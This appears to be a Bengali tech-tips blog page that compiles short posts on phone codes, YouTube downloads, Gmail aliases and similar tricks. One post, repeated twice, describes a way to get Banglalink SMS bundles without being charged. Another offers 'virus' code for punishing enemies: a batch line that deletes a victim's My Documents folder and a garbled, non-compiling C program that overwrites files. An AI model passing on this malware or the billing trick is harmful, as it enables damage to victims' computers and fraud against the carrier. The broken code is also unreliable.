বিশেষ আর্টিক্যাল

SIM এর আজানা নাম্বার বের করুন সহজেই

আমরা সাধারণত অনেকেই হয়তো আমাদের সিম নাম্বার ভুলে যাই মাঝে মধ্যে যদি একের অধিক সিম থাকে। আবার নতুন সিম নিলেও তা হয়ে থাকে।অথবা পুরাতন সিম কিনলে তার নাম্বার জানা হয় না। এজন্য আপনি সহজেই আপনার মোবাইল হতে আপনার সিমের নাম্বার জানতে পারবেন। তাও আবার কোন টাকা খরচ না করেই। এজন্য আপনার যা করতে হবে তা হচ্ছে-
গ্রামীনফোন ইউজাররা ডায়াল করুন - *111*8*2#
বাংলালিংক ইউজাররা ডায়াল করুন - *666#
রবি ইউজাররা ডায়াল করুন - *140*2*4#
এয়ারটেল ইউজাররা ডায়াল করুন - *121*6*3#

হ্যাক করুন বাংলালিংক সিম থেকে আনলিমিটেড এস.এম.এস !!!

আমরা বর্তমানে অনেকেই বাংলালিংক সিম ইউজ করি।
বাংলালিংক সিমে আনলিমিটেড এস.এম.এস আনার সিস্টেমটা আশা করি সবাই জানেন,তারপরও যারা জানেন না তাদের জন্য বলছি।
*132*1#লিখে ডায়াল করেReply এ আবার 1প্রেস করলেই৫.৭৫ টাকা কাটবে। এবং আপনি একদিনের জন্য ৫০০ এস এম এস পাবেন।
এভাবে প্রতিদিন ৫ টাকা দিয়ে এস এম এস কিনলে পোষায় না।
তাই আমি আজ আপনাদেরকে এমন একটি উপায় বলব যার মাধ্যমে আপনি প্রতিদিন ৫০০ কিংবা যত খুশি  এস. এম.এস পেতে পারেন একদম ফ্রী। অর্থাৎ কোন টাকা কাটবেনা।
এইবার আসি কাজের কথায়।
প্রথমেআসুনদেখিযাযালাগবেঃ
১। একটি বাংলালিংক সিম।
২। সিমে ব্যালেন্স থাকতে হবে কমপক্ষে ৫.৭৫ টাকা। তবে ৭ টাকার বেশি হলে হবে না। অর্থাৎ আপনার ব্যালেন্স থাকতে হবে ৫.৭৫ থেকে ৭ টাকার মধ্যে।
৩। নোকিয়ার একটি Simple মোবাইল। যেমনঃ ১২০২,১২০৮,১২০৯,১১০০,১২০০,১১১০ ইত্যাদি হলে ভাল হয়। তবে চায়না ফোনে হবে না।
৪। অন্য আরেকটি মোবাইল ( যেকোনো মডেল ও যেকোনো অপারেটর হলে চলবে )।
এইবারআসুনকিভাবেকাজটিকরতেহবেতাদেখেনেইঃ
১। প্রথমে আপনার বাংলালিংক ফোন থেকে আপনার পাশে থাকা অন্য একটিমোবাইল নাম্বারে ১ টা কল দেন।
২। কল টা রিছিভ করবেন না।
৩। কল টা ডুকার সাথে সাথে চাপুন *132*1#
এবং পরে Reply এ 1প্রেস করেOk চাপুন।
৪। Request not completedদেখাবে।
৫। এখন কল টা কেটে দিন অথবা Ring শেষ না হওয়া পর্যন্ত অপেক্ষা করুন।
৬। এবার*124# ডায়ালকরে আপনার ব্যালেন্সদেখুন। ( দেখবেন অপরিবর্তিত আছে )।
৭। এখন *124*2# ডায়াল করে আপনার ফ্রী এস এম এস এর ব্যালেন্স দেখে নিন।
এভাবে যত খুশী ততবার এস এম এস কিনুন একদম ফ্রীতে।
বিশেষদ্রষ্টব্যঃ৩০ সেকেন্ড এর ভেতর পুরো কাজ শেষ করতে হবে। এই এসএমএস আপনি শুধু Banglalink to Banglaink নাম্বারে পাঠাতে পারবেন।

টাকা ইনকাম করুন আপনার ওয়েব সাইটে add দিয়ে

একটি ফ্রী মোবাইল ডাউনলোড সাইট

কেমন আছেন সবাই? আসা করি সবাই ভালো আছেন। আজ আমি আপনাদের একটি ডাউনলোড সাইট এর সাথে পরিচয় করিয়ে দিব। এটি আমার বানানো একটি মোবাইল সাইট যেটি এক বছর অতিক্রান্ত করে দুই বছরে পা দিয়েছে। তাই এই নতুন ভার্সন এ আপনাদের জন্য নিয়ে এসেছি কয়েক লাখ এরও অধিক মোবাইল
ডাউনলোডস।
নিচে কিছু স্ক্রীনশট দিলাম। দেখুন কার মোবাইল এর কি লাগে।
সাইট এর লিঙ্ক এখানে ক্লিক করুন bd2fun.com

youtube থেকে ভিডিও download করুন সহজে

আমি আপনাদের কে Youtube থেকে কিভাবে সহজে ভিডিও ডাউনলোড করা যায় তা দেখাব। যদিও অনেকেই মনে হয় জানেন। কিন্তু এই পদ্ধতি যারা জানেন না তাদের জন্য এই লেখা।
প্রয়োজনীয় সফটওয়্যার:
০১. Mozilla Firefox
০২. Free Download Manager (অত্যাবশ্যকীয় নয়)
Mozilla Firefox ইনস্টল করা থাকলে ভাল, আর না থাকলে ডাউনলোড করে ইনস্টল করে নিন। এবার http://www.google.com/ এই লিংক এ যান। পেজে রাইট বাটন ক্লিক করে Bookmark This Page অথবা ctrl+D চাপুন। Name এর ঘরে Youtube Video Downloder লিখে Done এ ক্লিক করুন। এরপর বুকমার্কস এ Youtube Video Downloder এ রাইট বাটন ক্লিক  করে Properties এ ক্লিক করুন।
Location এর ঘরে নিচের কোডটি কপি করে পেষ্ট করুন।

javascript:if(document.location.href.match(/http:\/\/[a-zA-Z\.]*youtube\.com\/watch/)){document.location.href='http://www.youtube.com/get_video?fmt='+(isHDAvailable?'22':'18')+'&video_id='+swfArgs['video_id']+'&t='+swfArgs['t']}

Save Changes এ ক্লিক করুন। এরপর Youtube এ গিয়ে কোন ভিডিও চালু করে Bookmarks থেকে Youtube Video Downloder এ ক্লিক করলে ভিডিওটি mp4 ফরম্যাটে ডাউনলোড হবে। ডাউনলোড স্পীড ভাল পেতে চাইলে Free Download Manager ব্যবহার করতে পারেন।

ফ্রী 45MB ইন্টারনেট ।গ্রামীণ ফোন গ্রাহকদের জন্য ।

চলুন উপভোগ করি ৪৫এম বি ফ্রি ইন্টারনেট ।গ্রামীণ ফোন থেকে মেসেজ অপশনে গিয়ে টাইপ করুন "Click" এবং সেন্ড করুন 9999 নম্বরে ।ফিরতি SMS এ আপনি পাবেন 45MB Free internet.
একাউন্ট চেক করতে *566*10# ডায়াল করুন ।

এবার জেনে নিন আপনার ওয়েবসাইটটির লোড হওয়ার গতি কত?

আপনি কি জানতে চান আপনার ওয়েবসাইট টি লোড হতে কত সময় নেয় এবং লোড হওয়ার গতি কেমন? এটা আসলে সকলের ই জানা উচিত যে তাদের ওয়েবসাইট টি কেমন দ্রুত এবং কত সময় নিচ্ছে লোড হতে কারন আপনার সাইট টি যদি লোড হতে অনেক বেশি সময় নেয় তাহলে ভিসিটররা বিরক্ত হবে এবং এতে করে আপনি অনেক ক্ষেত্রে পিছিয়ে পরবেন। তাহলে আর দেরি না করে এখনি জেনে নিন আপনার ওয়েবসাইট টি কেমন দ্রুত লোড হচ্ছে এবং কত সময় নিচ্ছে।
যেভাবে জানবেন আপনার ওয়েবসাইটটির লোড হওয়ার গতি কতঃ
প্রথমে এই সাইট টিতে যান
এবার নিচের ছবি গুলি দেখুনঃ



 তাহলে আর দেরি না করে এখনি দেখে নিন।।

যেভাবে বুঝবেন আপনার সাধের পিসিতে ভাইরাস আছে কিনা

প্রতিনিয়ত বের হচ্ছে নতুন নতুন ভাইরাস। সব ভাইরাসও এ্যন্টি-ভাইরাসও ধরতে পারে না । যতক্ষন প্রজন্ত ওই ভাইরাসটি এ্যন্টিভাইরাসের ডাটাবেসে সংযুক্ত হবে ততক্ষন প্রজন্ত ওই ভাইরাসটি ধরতে পারবে না। কিন্তু ততক্ষনে তো আপনার বারো দুগুনে চব্বিশটা বেজে যাবে। আমি দেখাবো যেভাবে বুঝবেন ভাইরাস আছে কিনা এবং কিভাবে মুক্তি পাবেন।

ভাইরাস থাকলে পিসিতে প্রসেস সম্পর্কিত কিছু ব্যাপার লক্ষ্য করা যায়। আসুন দেখে নেই সেগুলো।
  • টাস্ক ম্যানেজার এ কিছু অজানা প্রসেস(process) দেখবেন।
  • এই প্রসেস গুলোর নাম লিখে গুগল এ সার্চ দিন যদি দেখতে পান ভাইরাস বা ভাইরাস সম্পরকিত কোন কিছু দেখতে পান তাহলে বুঝবেন ওই প্রসেসটা ভাইরাস।
  • এবং ওই প্রসেসটা “End Process” করলে এরর আসবে “End” হবে না।
  • তাহলে উক্ত প্রসেস এর উপর ডান বাটন চাপুন এবং দেখুন “Open File Location” নামে একটা অপশন আছে ওইটাতে ক্লিক করুন। বেশিরভাগ ভাইরাসের লোকেশন থাকে “C:/system32” তে।
  • ফাইলটা ডিলিট করে ফেলুন। যদি ডিলিট না হয় তাহলে এন্টি ভাইরাস দিয়ে স্ক্যান দিন তাও যদি ভাইরাস না পায় তাহলে পিসি অন করে “Safe Mode” এ অন করুন এবং ওই লোকেশন এ যান এবং ডিলিট করুন। এইবার ৮০% ডিলিট হওয়ার সম্ভাবনা। তাও যদি না হয় তাহলে আবার উইন্ডোজ সেটআপ দিন।

এবার আসছে চিকিৎসক স্মার্টফোন

আজ আপনাদের জন্য দিচ্ছি দারুন একটি প্রযুক্তি নিউজ। রোগীদের রোগ সম্পর্কে জানতে হাসপাতাল ও ডায়াগনস্টিক সেন্টারগুলোতে ঘণ্টার পর ঘণ্টা অপেক্ষায় থাকার ক্লান্তি ও বিরক্তি দূর করতে এবার আসছে ফোনে রোগ নির্ণয়ের ব্যবস্থা। দক্ষিণ কোরিয়ার গবেষকদের ধারণা সত্য হলে খুব শিগগিরই আপনার স্মার্টফোন মুহূর্তেই জানিয়ে দেবে, কী রোগে আপনি আক্রান্ত হয়েছেন। এমনকি ক্যানসারের মতো রোগও নির্ভুলভাবে শনাক্ত করতে পারবে এই স্মার্টফোন।
বার্তা সংস্থা রয়টার্সের খবরে বলা হয়, কোরিয়া অ্যাডভান্সড ইনস্টিটিউট অব টেকনোলজির (কেএআইএসটি) একদল গবেষক দেখেছে, জৈব আণবিক বস্তু শনাক্ত করার কাজে টাচ স্ক্রিন প্রযুক্তি ব্যবহার করা যেতে পারে।
গবেষণাদলে নেতৃত্বদানকারী দুই গবেষক হিয়ুন গিয়ু পার্ক ও বিয়ং ইয়ুন উন বলেন, আঙুলের স্পর্শ পাওয়ার সঙ্গে সঙ্গে ওই টাচ স্ক্রিন বৈদ্যুতিক কিছু সংকেত পায়। টাচ স্ক্রিনের মাধ্যমে ব্যক্তিভেদে সুনির্দিষ্ট প্রোটিন ও ডিএনএ শনাক্ত করা যাবে। স্মার্টফোনের টাচ স্ক্রিনে কোনো ব্যক্তির ছোঁয়া লাগলে তার শরীরের চার্জের মাধ্যমে তাকে শনাক্ত করা যায়। কারণ একেক মানুষের প্রোটিন ও ডিএনএ একেক রকমের হয়ে থাকে।
গবেষক পার্ক জানান, স্মার্টফোনের ওই টাচ স্ক্রিনের মাধ্যমে প্রায় শতভাগ ডিএনএ অণুকে সঠিকভাবে শনাক্ত করা সম্ভব। মানবদেহের প্রোটিন নির্ণয়েও একই প্রযুক্তি ব্যবহার করা যেতে পারে। আর লিভারের ক্যানসার নির্ণয়ের জন্য এই প্রোটিনকে কাজে লাগে। অথচ প্রচলিত প্রযুক্তিতে এই ফলাফল নির্ণয় করতে অনেক বড় বড় যন্ত্রপাতির প্রয়োজন হয়। জার্মানির একটি বিজ্ঞান সাময়িকীতে প্রকাশিত ওই গবেষণা প্রতিবেদনে আরও বলা হয়, মানুষের রোগ নির্ণয়ের জন্য আরও বিভিন্ন জৈব আণবিক বস্তু শনাক্ত করতে গবেষকেরা একধরনের সংবেদনশীল ফিল্ম উদ্ভাবনের চেষ্টা করছেন। টাচ স্ক্রিনে রোগীর রক্ত বা মুত্রের নমুনা নেওয়া যাবে না। একটি কাপড়ে তা রেখে বিশেষ উপায়ে ফোনের সাথে সংযুক্ত করার ব্যবস্থা করা হবে। যাকে পার্ক বলেছেন, ‘প্রবেশমুখ’ (এন্ট্রান্স পয়েন্ট)। অবশ্য কবে নাগাদ এই স্মার্ট ফোন তৈরি করা সম্ভব হবে, সে ব্যাপারে সঠিক কোনো ধারণা দেননি গবেষকেরা।

পেন ড্রাইভে ফরমেট পরিবর্তন করে করুন NTFS

আমরা সাধারণত জানি পেন ড্রাইভ FAT, FAT32 সিস্টেমে চলে। কিন্তু এই ফাইল সিস্টেমে কোনো ফাইল কম্প্রেস করা যায় না। কিন্তু NTFS ফাইল সিস্টেমে এই সুবিধা রয়েছে। এটি করলে পেন ড্রাইভে ফাইল সংরক্ষণে তুলনামুলক অর্ধেক যায়গা লাগে। এটি করার জন্য প্রথমে start মেনুতে গিয়ে cmd লিখে এন্টার দিতে হবে। এখন কমান্ড box এ C:Document and settings\Administrator> এর পর convert X:NTFS লিখে এন্টার দিতে হবে। এখানে X এর যায়গায় পেন ড্রাইভ যে ড্রাইভে রয়েছে তার নাম লিখতে হবে। এখন My Computer এ গিয়ে পেন ড্রাইভ আইকনে Right বাটন ক্লিক করে Propertices a যেতে হবে। এখান থেকে Compress Drive To Save Disc Space অপশনে টিক দিয়ে ওকে করতে হবে। এখন Apply To Sub Folders and Files। হয়ে গেল আপনার চাওয়াটা পূরণ আশা করি।

আপনার পেনড্রাইবের মাধ্যমে ভাইরাস আর আপনার কম্পিউটারে আসবেনা ও কারো কম্পিউটারেও যাবে না ১০০%।

আমাদের কম্পিউটারে সধারনতো ভাইরাস আসে পেনড্রাইবের মাধ্যমে তাই এই ব্যাবস্থা করলাম। এ জন্য আপনার পেনড্রাইবের
একটি নতুন ফোল্ডার বানান তার পর rename করে নাম দিন autorun.inf ।
এরপর আরএকটি নতুন ফোল্ডার বানান তার পর rename করে নাম দিন Copy of Shortcut to (1).lnk ।
আরএকটি নতুন ফোল্ডার বানান তার পর rename করে নাম দিন Copy of Shortcut to (2).lnk
আরএকটি নতুন ফোল্ডার বানান তার পর rename করে নাম দিন Copy of Shortcut to (3).lnk
আরএকটি নতুন ফোল্ডার বানান তার পর rename করে নাম দিন Copy of Shortcut to (4).lnk
আরএকটি নতুন notepade নিয়ে নাম দিন RECYCLER ।
এরপর সব কিছু হিডেন করে রাখুন বাজ কাজ শেষ।
আশা করি ১০০% আপনার পেনড্রাইবের মাধ্যমে ভাইরাস ছরাবেনা।

C Drive এ ভাইরাস বানান (শত্রুকে ঘায়েল করার সহজ উপায়)

এই টিউনটি শুধুমাএ শেখার জন্য । তাই কেউ এই টিউনের অপব্যবহার করবেন না ।
কেউ করলে আমি দায়ী নই ।
এই টিউনে শেখানো হবে কীভাবে C drive(system drive) এ ভাইরাস তৈরী করে শত্রুকে শায়েস্তা করা যায় । এই টিউনে আপনাদের দুটি ভাইরাস তৈরী করা শেখাবো ।
আসেলে এটি মূলত এক ধরণের BATCH ফাইল । বিভিন্ন রকম কোড ব্যবহার আমরা এই ধরণের BATCH ফাইল তৈরী করতে পারি ।
আসেন শুরু করি ।
ভাইরাস কোড ০১:
এটি খুব ই ছোট একটি কোড । এটি ভিকটিমের my documents ফোল্ডার ডিলিট করে দিবে ।
*.প্রথমে নোটপ্যাড ওপেন করুন ।
*. নিচের কোডটি কপি করে নোটপ্যাডে নিন
rmdir C:\Documents and Settings \S\Q.
*.এবার এটিকে .bat এই format এ যেকোনো নাম দিয়ে সেভ করুন ।
যেমন: virus.bat
*. এবার এটি আপনার ভিকটিমের পিসিতে দিয়ে দিন । আর ভিকটিম যখন এটিতে ক্লিক করবে তখন আরকি my documents folder উধাও ।
মুক্তি পাবেন যেভাবে :
*. My documents folder টি ফেরত পেতে চাইলে কষ্ট করে আবার সিস্টেম ইনস্টল করুন ।
ভাইরাস কোড ০২:
এই পদ্ধতিটা একটু জটিল খেয়াল রাখবেন কোথায় যেনো কিছু ভুল না হয় ।
আসুন দেখে নেই এই ভাইরাসেয় কার্যকারতি ।
এটি তৈরী করবে

ফোল্ডার অসংখ্যা ফোল্ডার । সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার । ভিকটিমের এক একটি ফোল্ডারের ফাইল ছড়িয়ে পড়বে এই সব ফোল্ডারে । সব এলোমেলো হয়ে যাবে ।
*.notepad ওপেন করুন এবং নিচের কোডটি কপি করে নিন ।
#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
*. .bat format এ পছন্দ মতো নাম দিয়ে সেভ করুন ।
*. আগের মতোই যখন এটাতে ক্লিক করা হবে আর তখন ই শুরু হবে ফোল্ডার বিস্ফোরণ :-P
মুক্তির উপায় :
*. Hard disk টি সম্পূর্ণ ফরমেট করে নতুনভাবে সিস্টাম ইনস্টল করতে হবে । (শত্রুর সব শেষ)
ভালো থাকবেন । আর আমার টিউনগুলো কেমন হচ্ছে জানাতে ভুলবেন না ।

Facebook চ্যাটে Color টেক্সট পাঠিয়ে আপনার বন্ধুদের অবাক করে দিন।

আমরা সবাই জানি Facebook Chat Box লেখার কালার Black হিসেবে Default রাখা হয়। কিন্তু আপনি এই Black Text এ সিমিত না থেকে আপনার বন্ধুদের তাক লাগিয়ে দিতে নিচের Color Code গুলো ব্যবহার করতে পারেন। আপনি ইচ্ছা করলে এই কালার কোড গুলো মাধ্যমে আপনার Facebook বন্ধুদেরকে Message Send করতে পারবেন।
কিন্তু এই Color Code গুলো States Update এবং Mobile এ Support করে করবে না।
এখানে কোডগুলোর তাদের alphabets সাথে তালিকা দেওয়া দেওয়া হল।:--

[[107015582669715]] = A
                                                            [[116067591741123]] = B
                                                           [[115602405121532]] = C
                                                           [[112542438763744]] = D
                                                           [[115430438474268]] = E
                                                           [[109225112442557]] = F
                                                           [[111532845537326]] = G
                                                           [[111356865552629]] = H
                                                           [[109294689102123]] = I
                                                           [[126362660720793]] = J
                                                           [[116651741681944]] = K
                                                           [[115807951764667]] = L
                                                           [[106596672714242]] = M
                                                           [[108634132504932]] = N
                                                           [[116564658357124]] = O
                                                           [[111669128857397]] = P
                                                           [[107061805996548]] = Q
                                                           [[106699962703083]] = R
                                                           [[115927268419031]] = S
                                                           [[112669162092780]] = T
                                                           [[108983579135532]] = U
                                                           [[107023745999320]] = V
                                                           [[106678406038354]] = W
                                                           [[116740548336581]] = X
                                                           [[112416755444217]] = Y
                                                           [[165724910215]] = Z
আপনি যদি ফেসবুক চ্যাঁট বক্সে HELLO লিখতে চান তাহলে Color Code গুলো হবে এইভাবেঃ-[[111356865552629]] [[115430438474268]] [[115807951764667]] [[115807951764667]] [[116564658357124]]
( প্রতিটা Color Code এর পর একটা Specs হবে।)
এখানে ফেসবুক চ্যাট রঙিন টেক্সট পাঠানোর স্ক্রিনশট
  আমাকে Facebook পেতে এখানে ক্লিক করুন এখানে।

এটা কি পৃথিবীর একমাত্র ওয়েবসাইট যা ইন্টারনেট সংযোগ ছাড়াই চলে??

আমি মোটেও রসিকতা করছি না, এই মাত্র একটা ওয়েবসাইটের সন্ধান পেলাম যেটা ইন্টারনেট কানেকশন ছাড়াই চলে। আপনি ইন্টারনেট কানেকশন রাখলে ব্রাউজ করতে পারবেন না। তবে কানেকশন বন্ধ করে ব্রাউজ করতে পারবেন। আপনি ইন্টারনেট কানেকশন দিলে নিচের ছবি আসবে।
এটা সাধারণ কোন মানুষের ওয়েবসাইট না। সুপারপাওয়ার মুভি রোবট” নিশ্চয় সবাই দেখেছেন। হ্যা, এটা বলিউড সুপারস্টার রজনীকান্তের ওয়েবসাইট।
আগেই কমেন্ট করেন না, সবকিছুর আগে আমার কথার সত্যতা পরীক্ষা করার জন্য রজনী কান্তের ওয়েবসাইটে যান, এরপর ইন্টারনেট কানেক্ট পুনারয় দিয়ে কমেন্ট করেন।
                                                     রজনী কান্তের ওয়েবসাইট - www.allaboutrajni.com

একটাই জিমেইল আইডি কে ব্যবহার করুন মিলিয়ন বিলিয়ন আইডি হিসেবে


gmail বর্তমান সময়ে সম্ভবত সব থেকে জনপ্রিয় ইমেইল সার্ভিস প্রোভাইডার। আমরা সবাই কম বেশী জিমেইল ব্যবহার করি বা করে থাকি।জিমেইল এর অনেক ফিচার এর পাশাপাশি এর সহজ ও সাবলীল উপস্থাপনাই এনে দিয়েছে এই বিপুল জনপ্রিয়তা। আজ আপনাদের সাথে শেয়ার করব জিমেইল এর সহজ কিন্তু খুবই করজকরী ১ টা ট্রিক। এটা হচ্ছে আপনার একটাই জিমেইল আইডি কে আপনি কিভাবে মিলিয়ন - বিলিয়ন আইডি হিসেবে ব্যবহার করতে পারবেন।

আসুন দেখে নেই কিভাবে

ডোমেইন নাম চেঞ্জ করে

ধরুন আমার একটা জিমেইল আইডি আছে এবং সেটা হচ্ছে sambarua2012@gmail.com. এখন আমি ফেসবুক এ একটা আইডি খুললাম এই ইমেইল আইডি টি ব্যবহার করে। আপনার কি মনে হয় আমি আবারো এক ই আইডি ব্যবহার করে আর আইডি খুলতে পারব ফেসবুক এ? না, তাই না? কিন্তু আসলে তা সম্ভব এই একই আইডি ব্যবহার করে। যেমন আমি যদি sambarua2012@gmail.com এর জায়গায় লিখি sambarua2012@googlemail.com তাহলে এটা ফেসবুক এর সার্ভার এ দেখাবে ভিন্ন দুইটি আইডি হিসেবে কিন্তু আসলে এটা ওই আগের আইডি এর ই মিরর! দুইটা আইডি এর ইনবক্স কিন্তু একটাই!

+ লেজুড় জুড়ে দিয়ে

জিমেইল এর আসল আইডি sambarua2012@gmail.com @ এর আগে এবং sambarua2012 এর পর আপনি যা ইচ্ছা টাই লেজুড় জুড়ে দিতে পারেন শুধু মাঝে একটা "+" চিহ্ন থাকতে হবে। যেমন ধরুন sambarua2012+goom.jhamu.na@gmail.com, sambarua2012+infocus2u@gmail.com ইত্যাদি। আপনার যত ইচ্ছা আপনি তত গুলো আইডি এভাবে বানাতে পারেন শুধু + এবং লেজুড় জুড়ে দিয়ে। সব ই কিন্তু আসল আইডি sambarua2012@gmail.com মিরর হবে। অর্থাৎ এর যেকোনো টার ই ইনবক্স হবে আসল আইডি এর ইনবক্স ! ! !

(.) Dot চিহ্ন ব্যবহার করে

আসল আইডি sambarua2012@gmail.com এর যে কোন জায়গায় যে কোন ভাবে ডট চিহ্ন (.) ব্যবহার করে ও আপনি তৈরি করতে পারেন মিলিয়ন বিলিয়ন মিরর আইডি । যেমন sam.barua2012@gmail.com, sam.barua.20.12@gmail.com, sam.barua.2012@gmail.com এগুলর সবগুলই কিন্তু আপনার আসল আইডি এর মিরর আইডি হবে। অর্থাৎ এগুলর যেকোনো একটা তে যে কোন মেইল আসলে তা কিন্তু মূল আইডি sambarua2012@gmail.com এর ইনবক্সেই পাওয়া যাবে। কিন্তু যেকোনো সার্ভার এ এটাকে এক বলে চিনতে পারবে না। identical difference এর জন্য এগুলর প্রত্যেকটাকে একটা ভিন্ন আইডি হিসেবে গননা করবে যে কোন সার্ভার!

এই ভাবেই আপনি আপনার জিমেইল আইডি থকে কোন কষ্ট ছাড়াই সর্বাধিক ফায়দা নিতে পারেন। আরা করি আপনাদের ভালো লেগে থাকবে টিউন টি। কাজে লেগে থাকলে তো কথাই নেই।

এক সিডিতে বার বার রাইট করা (সফটওয়্যার ছাড়া)…..

আশা করি সবাই ভালো আছেন। আমার টিউনটি একদম নুতুনদের জন্য। এক্সপার্টদের জন্য নয়। এক্সপার্টদের সকলের মনে হয় জানা আছে। এবার কাজের কথায় আসি। আমরা অনেক সময় আমাদের দরকারি ফাইল গুলু ব্লাঙ্ক সিডিতে রাইট করে রাখি। একটি ব্লাঙ্ক সিডিতে প্রায় ৭০০ মেগাবাইট পয‍‍‍‌‌ন্ত রাইট করা যায়। কিন্তু অনেক সময় কম মেগাবাইট এর ফাইল সিডিতে রাইট করার প্রয়োজন হয়। তখন আমরা তা সিডিতে রাইট করি। কিন্তু আমরা অনেকেই জানিনা যে এক সিডিতে একবার রাইট করে ফেললে পরে আবার একাধিক বার রাইট করা যায়। আসুন প্রক্রিয়াটি দেখি।




















কিছুক্ষন পরে উপরের ছবির মতো চার্ট আসলে Finish এ ক্লিক করতে হবে। Finish এ ক্লিক করার পরে সিডি/ডিভিডি রম থেকে সিডিটা নিজে নিজেই বের হয়ে যাবে। কাজ শেষ। এই এক নিয়মেই আপনি এক সিডি তে বার বার রাইট করতে পারবেন। এক নিয়মেই আপনি Computer এ সফটওয়্যার ছাড়া সিডি রাইট করতে পারবেন।

জানতে চাই সব কিছুঃ GPRS/EDGE/etc


আমরা যখন কোনো মোবাইল ফোন কিনতে যাই তখন আমরা দেখতে পাই মোবাইলের ক্যাটালগে Edge বা Gprs লিখা থাকে। কিন্তু আমরা জানি না যে এর অর্থ কি। আমরা সাধারণত ধরে নেই এই ফোন দিয়ে ইন্টারনেট ব্যবহার করা যাবে কিন্তু অন্য কোনো ধারণা থাকে না। এখান থেকে জেনে নিন যে এর মাধ্যমে ইন্টারনেট ব্যবহারে কি ধরনের প্রভাব পরতে পারে।
# General Packet Radio Service (GPRS) : GPRS হচ্ছে পুরাতন ইন্টারনেট টেকনোলজি। GPRS সিস্টেম এ ইন্টারনেট এর স্পীড পাওয়া সম্ভব সর্বোচ্চ 20 kbps। বিশ্বের প্রায় সব দেশেই এ সিস্টেমটি ব্যবহার করা হয়।
# Enhanced Data rate for GSM Evolution (EDGE) : EDGE GPRS এর চেয়ে খুব দ্রুত কাজ করতে সক্ষম এবং এতে সর্বোচ্চ স্পীড পাওয়া সম্ভব 60kbps। এটিও প্রায় সব দেশে ব্যবহার করা হয়।
#Universal Mobile Telephony Service (UMTS): UMTS একটু উন্নত সার্ভিস যার সর্বোচ্চ স্পীড হতে পারে384 kbps। কিন্তু সব দেশে বা সব শহরে এই সিস্টেমটি নেই।
# High Speed downlink Packet Access (HSDPA) : HSDPA হচ্ছে বর্তমানের সবচেয়ে আধুনিক ও উন্নত

হ্যাক করুন বাংলালিংক সিম থেকে আনলিমিটেড এস.এম.এস !!!!

আমরা বর্তমানে অনেকেই বাংলালিংক সিম ইউজ করি।
বাংলালিংক সিমে আনলিমিটেড এস.এম.এস আনার সিস্টেমটা আশা করি সবাই জানেন,তারপরও যারা জানেন না তাদের জন্য বলছি।
*132*1#লিখে ডায়াল করেReply এ আবার 1প্রেস করলেই৫.৭৫ টাকা কাটবে। এবং আপনি একদিনের জন্য ৫০০ এস এম এস পাবেন।
এভাবে প্রতিদিন ৫ টাকা দিয়ে এস এম এস কিনলে পোষায় না।
তাই আমি আজ আপনাদেরকে এমন একটি উপায় বলব যার মাধ্যমে আপনি প্রতিদিন ৫০০ কিংবা যত খুশি এস. এম.এস পেতে পারেন একদম ফ্রী। অর্থাৎ কোন টাকা কাটবেনা।
এইবার আসি কাজের কথায়।
প্রথমেআসুনদেখিযাযালাগবেঃ
১। একটি বাংলালিংক সিম।
২। সিমে ব্যালেন্স থাকতে হবে কমপক্ষে ৫.৭৫ টাকা। তবে ৭ টাকার বেশি হলে হবে না। অর্থাৎ আপনার ব্যালেন্স থাকতে হবে ৫.৭৫ থেকে ৭ টাকার মধ্যে।
৩। নোকিয়ার একটি Simple মোবাইল। যেমনঃ ১২০২,১২০৮,১২০৯,১১০০,১২০০,১১১০ ইত্যাদি হলে ভাল হয়। তবে চায়না ফোনে হবে না।
৪। অন্য আরেকটি মোবাইল ( যেকোনো মডেল ও যেকোনো অপারেটর হলে চলবে )।
এইবারআসুনকিভাবেকাজটিকরতেহবেতাদেখেনেইঃ
১। প্রথমে আপনার বাংলালিংক ফোন থেকে আপনার পাশে থাকা অন্য একটিমোবাইল নাম্বারে ১ টা কল দেন।
২। কল টা রিছিভ করবেন না।
৩। কল টা ডুকার সাথে সাথে চাপুন *132*1#
এবং পরে Reply এ 1প্রেস করেOk চাপুন।
৪। Request not completedদেখাবে।
৫। এখন কল টা কেটে দিন অথবা Ring শেষ না হওয়া পর্যন্ত অপেক্ষা করুন।
৬। এবার*124# ডায়ালকরে আপনার ব্যালেন্সদেখুন। ( দেখবেন অপরিবর্তিত আছে )।
৭। এখন *124*2# ডায়াল করে আপনার ফ্রী এস এম এস এর ব্যালেন্স দেখে নিন।
এভাবে যত খুশী ততবার এস এম এস কিনুন একদম ফ্রীতে।
বিশেষদ্রষ্টব্যঃ৩০ সেকেন্ড এর ভেতর পুরো কাজ শেষ করতে হবে। এই এসএমএস আপনি শুধু Banglalink to Banglaink নাম্বারে পাঠাতে পারবেন।

বাংলাদেশ এবার স্যাটেলাইট উৎক্ষেপণ করতে যাচ্ছে


বাংলাদেশের প্রযুক্তি খাতে খুব শীঘ্রই একটি বড় বিবর্তন আসতে যাচ্ছে। বাংলাদেশ আগামী ২ বছরের মধ্যে একটি স্যাটেলাইট উৎক্ষেপন করতে যাচ্ছে। ২০১৩ সালের মধ্যে এই স্যাটেলাইট এর যাবতীয় কাজ শেষ হবে বলে আশা করা যাচ্ছে। এই কার্যক্রমটির তদারকিতে থাকবে বাংলাদেশ স্পেস রিসার্চ এন্ড রিমোট সেন্সিং অর্গানাইজেশন।
